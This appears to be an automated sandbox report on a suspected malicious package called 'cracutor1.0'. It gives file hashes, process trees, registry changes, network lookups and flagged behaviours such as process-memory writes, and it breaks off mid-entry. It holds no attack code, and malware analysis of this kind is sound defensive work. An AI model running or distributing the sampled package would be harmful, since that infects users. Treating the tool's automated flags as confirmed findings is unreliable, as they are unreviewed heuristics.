SHA1 b86042c96f2ce6d8a239b7d426f298a23df8b3b9
SHA256 50daeb3985302a8d85ce8167b0bf08b9da43e7d51ceae50e8e1cdfb0edf218c6
SHA512 22a5fd139d88c0eee7241c5597d8dbbf2b78841565d0ed0df62383ab50fde04b13a203bddef03530f8609f5117869ed06894a572f7655224285823385d7492d2

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_decimal.pyd

MD5 1cdd7239fc63b7c8a2e2bc0a08d9ea76
SHA1 85ef6f43ba1343b30a223c48442a8b4f5254d5b0
SHA256 384993b2b8cfcbf155e63f0ee2383a9f9483de92ab73736ff84590a0c4ca2690
SHA512 ba4e19e122f83d477cc4be5e0dea184dafba2f438a587dd4f0ef038abd40cb9cdc1986ee69c34bac3af9cf2347bea137feea3b82e02cca1a7720d735cea7acda

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_cffi_backend.cp310-win_amd64.pyd

MD5 ebb660902937073ec9695ce08900b13d
SHA1 881537acead160e63fe6ba8f2316a2fbbb5cb311
SHA256 52e5a0c3ca9b0d4fc67243bd8492f5c305ff1653e8d956a2a3d9d36af0a3e4fd
SHA512 19d5000ef6e473d2f533603afe8d50891f81422c59ae03bead580412ec756723dc3379310e20cd0c39e9683ce7c5204791012e1b6b73996ea5cb59e8d371de24

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_brotli.cp310-win_amd64.pyd

MD5 ee3d454883556a68920caaedefbc1f83
SHA1 45b4d62a6e7db022e52c6159eef17e9d58bec858
SHA256 791e7195d7df47a21466868f3d7386cff13f16c51fcd0350bf4028e96278dff1
SHA512 e404adf831076d27680cc38d3879af660a96afc8b8e22ffd01647248c601f3c6c4585d7d7dc6bbd187660595f6a48f504792106869d329aa1a0f3707d7f777c6

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_asyncio.pyd

MD5 6c2a86342ade2fac9454b83a49d17694
SHA1 52946875ad946e4a170072f38e28e10f6037fab9
SHA256 cf0edfd508d11bffb63d1b104b6099e0f14ea0fada762f88364e7163f2185f06
SHA512 48d8eb8d20d041df37c4a6f243056607754046ed5f497260751270b42e9eea6f22fb1fb62d015e841d0263534f50bf6c812a6ade0e8bb0a0f79226bc64d05c75

C:\Users\Admin\AppData\Local\Temp\_MEI37922\VCRUNTIME140_1.dll

MD5 7667b0883de4667ec87c3b75bed84d84
SHA1 e6f6df83e813ed8252614a46a5892c4856df1f58
SHA256 04e7ccbdcad7cbaf0ed28692fb08eab832c38aad9071749037ee7a58f45e9d7d
SHA512 968cbaafe416a9e398c5bfd8c5825fa813462ae207d17072c035f916742517edc42349a72ab6795199d34ccece259d5f2f63587cfaeb0026c0667632b05c5c74

C:\Users\Admin\AppData\Local\Temp\_MEI37922\unicodedata.pyd

MD5 a40ff441b1b612b3b9f30f28fa3c680d
SHA1 42a309992bdbb68004e2b6b60b450e964276a8fc
SHA256 9b22d93f4db077a70a1d85ffc503980903f1a88e262068dd79c6190ec7a31b08
SHA512 5f9142b16ed7ffc0e5b17d6a4257d7249a21061fe5e928d3cde75265c2b87b723b2e7bd3109c30d2c8f83913134445e8672c98c187073368c244a476ac46c3ef

C:\Users\Admin\AppData\Local\Temp\_MEI37922\sqlite3.dll

MD5 7bb1d577405f1129faf3ea0225c9d083
SHA1 60472de4b1c7a12468d79994d6d0d684c91091ef
SHA256 831ba87cb1a91d4581f0abbcc4966c6f4b332536f70cf481f609c44cc3d987c2
SHA512 33b1fd3a289193bff168c967caebc0131732bd04562a770cf2edac602ab6d958f7bde7a0e57bb125a7598852bdac30f96d0db46cb4a2460a61a0d914b011ed20

C:\Users\Admin\AppData\Local\Temp\_MEI37922\pyexpat.pyd

MD5 983d8e003e772e9c078faad820d14436
SHA1 1c90ad33dc4fecbdeb21f35ca748aa0094601c07
SHA256 e2146bed9720eb94388532551444f434d3195310fa7bd117253e7df81a8e187e
SHA512 e7f0fd841c41f313c1782331c0f0aa35e1d8ba42475d502d08c3598a3aaefd400179c19613941cdfad724eca067dd1b2f4c2f1e8a1d6f70eeb29f7b2213e6500

C:\Users\Admin\AppData\Local\Temp\_MEI37922\libssl-1_1.dll

MD5 bd857f444ebbf147a8fcd1215efe79fc
SHA1 1550e0d241c27f41c63f197b1bd669591a20c15b
SHA256 b7c0e42c1a60a2a062b899c8d4ebd0c50ef956177ba21785ce07c517c143aeaf
SHA512 2b85c1521edeadf7e118610d6546fafbbad43c288a7f0f9d38d97c4423a541dfac686634cde956812916830fbb4aad8351a23d95cd490c4a5c0f628244d30f0a

C:\Users\Admin\AppData\Local\Temp\_MEI37922\libcrypto-1_1.dll

MD5 63c4f445b6998e63a1414f5765c18217
SHA1 8c1ac1b4290b122e62f706f7434517077974f40e
SHA256 664c3e52f914e351bb8a66ce2465ee0d40acab1d2a6b3167ae6acf6f1d1724d2
SHA512 aa7bdb3c5bc8aeefbad70d785f2468acbb88ef6e6cac175da765647030734453a2836f9658dc7ce33f6fff0de85cb701c825ef5c04018d79fa1953c8ef946afd

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_lzma.pyd

MD5 5a77a1e70e054431236adb9e46f40582
SHA1 be4a8d1618d3ad11cfdb6a366625b37c27f4611a
SHA256 f125a885c10e1be4b12d988d6c19128890e7add75baa935fe1354721aa2dea3e
SHA512 3c14297a1400a93d1a01c7f8b4463bfd6be062ec08daaf5eb7fcbcde7f4fa40ae06e016ff0de16cb03b987c263876f2f437705adc66244d3ee58f23d6bf7f635

C:\Users\Admin\AppData\Local\Temp\_MEI37922\libffi-7.dll

MD5 eef7981412be8ea459064d3090f4b3aa
SHA1 c60da4830ce27afc234b3c3014c583f7f0a5a925
SHA256 f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081
SHA512 dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_ctypes.pyd

MD5 79f339753dc8954b8eb45fe70910937e
SHA1 3ad1bf9872dc779f32795988eb85c81fe47b3dd4
SHA256 35cdd122679041ebef264de5626b7805f3f66c8ae6cc451b8bc520be647fa007
SHA512 21e567e813180ed0480c4b21be3e2e67974d8d787e663275be054cee0a3f5161fc39034704dbd25f1412feb021d6a21b300a32d1747dee072820be81b9d9b753

C:\Users\Admin\AppData\Local\Temp\_MEI37922\Crypto\Cipher\_raw_cbc.pyd

MD5 0c46d7b7cd00b3d474417de5d6229c41
SHA1 825bdb1ea8bbfe7de69487b76abb36196b5fdac0
SHA256 9d0a5c9813ad6ba129cafef815741636336eb9426ac4204de7bc0471f7b006e1
SHA512 d81b17b100a052899d1fd4f8cea1b1919f907daa52f1bad8dc8e3f5afc230a5bca465bbac2e45960e7f8072e51fdd86c00416d06cf2a1f07db5ad8a4e3930864

C:\Users\Admin\AppData\Local\Temp\_MEI37922\Crypto\Cipher\_raw_ecb.pyd

MD5 dedae3efda452bab95f69cae7aebb409
SHA1 520f3d02693d7013ea60d51a605212efed9ca46b
SHA256 6248fdf98f949d87d52232ddf61fada5ef02cd3e404bb222d7541a84a3b07b8a
SHA512 8c1cab8f34de2623a42f0750f182b6b9a7e2affa2667912b3660af620c7d9ad3bd5b46867b3c2d50c0cae2a1bc03d03e20e4020b7ba0f313b6a599726f022c6c

C:\Users\Admin\AppData\Local\Tempcrrmvbxjol.db

MD5 42c395b8db48b6ce3d34c301d1eba9d5
SHA1 b7cfa3de344814bec105391663c0df4a74310996
SHA256 5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d
SHA512 7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845

C:\Users\Admin\AppData\Local\Tempcrkmsfpixi.db

MD5 7e58c37fd1d2f60791d5f890d3635279
SHA1 5b7b963802b7f877d83fe5be180091b678b56a02
SHA256 df01ff75a8b48de6e0244b43f74b09ab7ebe99167e5da84739761e0d99fb9fc7
SHA512 a3ec0c65b2781340862eddd6a9154fb0e243a54e88121f0711c5648971374b6f7a87d8b2a6177b4f1ae0d78fb05cf0ee034d3242920301e2ee9fcd883a21b85e

C:\Users\Admin\AppData\Local\Tempcrkipkqcvt.db

MD5 73bd1e15afb04648c24593e8ba13e983
SHA1 4dd85ca46fcdf9d93f6b324f8bb0b5bb512a1b91
SHA256 aab0b201f392fef9fdff09e56a9d0ac33d0f68be95da270e6dab89bb1f971d8b
SHA512 6eb58fb41691894045569085bd64a83acd62277575ab002cf73d729bda4b6d43c36643a5fa336342e87a493326337ed43b8e5eaeae32f53210714699cb8dfac7

C:\Users\Admin\AppData\Local\Tempcrykjucoyx.db

MD5 8f5942354d3809f865f9767eddf51314
SHA1 20be11c0d42fc0cef53931ea9152b55082d1a11e
SHA256 776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea
SHA512 fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

C:\Users\Admin\AppData\Local\Tempcrfvzqnoln.db

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Local\Tempcrhldqrmcd.db

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win7-20240221-en

Max time kernel

118s

Max time network

119s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\ICSharpCode.AvalonEdit.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\ICSharpCode.AvalonEdit.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win10v2004-20240426-en

Max time kernel

139s

Max time network

145s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe.config"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe.config"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win10v2004-20240508-en

Max time kernel

113s

Max time network

143s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.pdb"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.pdb"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 98.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 37.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win7-20240215-en

Max time kernel

134s

Max time network

128s

Command Line

"C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\lua.xml"

Signatures

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002f34c9305f14e34f823c71fe5af3e36e000000000200000000001066000000010000200000007fc33871e61776871046874761d2576f02ffecbe8f64d44c8940bc98802acf53000000000e8000000002000020000000aac190246efd9b7f50064f4e7299beda479889faca415057c724f260245a118d90000000c8e35a62b695a69eb5fb44c241aca76fc34b198d4c21a7e8e6cfe1c9c216c57cad7d46a0e57e5dcd11e6de98f40c01aab00c09c625a4b4d1c514e9800dce0a66a5acb41a3a0e4397f90e57a90354aa621e455e452d6d5ee813c240514e2dfd6cc3b31eba8349791f40bdf191a3240b522c3c418f33f6e9aabe7fe8d0e5a6636ef61a6863cf6ef320283db7887e1825e840000000901bd04974cdd559a657cec47d5e3c42c0ae0bb19513072a26cae37f79dbba9bbc060645d6d40f9be9416b3208ff724e7205e71f14018d585e3846b6fd3bb9de C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "422301129" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{2A37C911-1604-11EF-8ECF-42D431E39B11} = "0" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 401da8fe10aada01 C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002f34c9305f14e34f823c71fe5af3e36e00000000020000000000106600000001000020000000aa89af1aa4a28c8f4f4fce8e27680978327a8550a90c961c43938d080dc58688000000000e8000000002000020000000d08bf83bd7df01c1dc3d99036ff1bcc04a83612c571ecac727e855f516f02bf420000000d4029c639d9864710ef71a4a3fbc759c7d7ba704ba749052bb0e817545f9e0ee40000000a95a19927faa4c88f4293d818edd12fdc6fd23e4c307cf2c3dfd2bf720e22f4ded611b5a31180633098a18dabb34763ee9c3722521338c66a0982a3ac0dfeee7 C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2592 wrote to memory of 2532 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2592 wrote to memory of 2532 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2592 wrote to memory of 2532 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2592 wrote to memory of 2532 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2532 wrote to memory of 3004 N/A C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\IEXPLORE.EXE
PID 2532 wrote to memory of 3004 N/A C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\IEXPLORE.EXE
PID 2532 wrote to memory of 3004 N/A C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\IEXPLORE.EXE
PID 2532 wrote to memory of 3004 N/A C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\IEXPLORE.EXE
PID 3004 wrote to memory of 2632 N/A C:\Program Files\Internet Explorer\IEXPLORE.EXE C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 3004 wrote to memory of 2632 N/A C:\Program Files\Internet Explorer\IEXPLORE.EXE C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 3004 wrote to memory of 2632 N/A C:\Program Files\Internet Explorer\IEXPLORE.EXE C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 3004 wrote to memory of 2632 N/A C:\Program Files\Internet Explorer\IEXPLORE.EXE C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Processes

C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE

"C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\lua.xml"

C:\Program Files (x86)\Internet Explorer\iexplore.exe

"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome

C:\Program Files\Internet Explorer\IEXPLORE.EXE

"C:\Program Files\Internet Explorer\IEXPLORE.EXE" -nohome

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3004 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Cab23C9.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\Tar24CA.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e759ccdfacb7c5495688a702925d989b
SHA1 a46040ee34bf92218b59dc935376516879261bfa
SHA256 ac6bd6a0c92b9f4d057ef231f128971203ad3c38a8e830e770e6da516319979f
SHA512 f063e551c7ec665dfcf0d7d2b5574710ec423f5fd771b19d3f021957db00b70964a070261435b0c34de25187f8c96fb605d04af4e7cd367d70a9e47384556b8c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 da519be592c9f1a1bee73d11a637a171
SHA1 a2fcab26e8984d7b759fe15cd8c4a5a2186ce79a
SHA256 4ddd8656baf5979db2aea7a901bd526ebfc5aeb6cc3723d91b5baefffc60d5e8
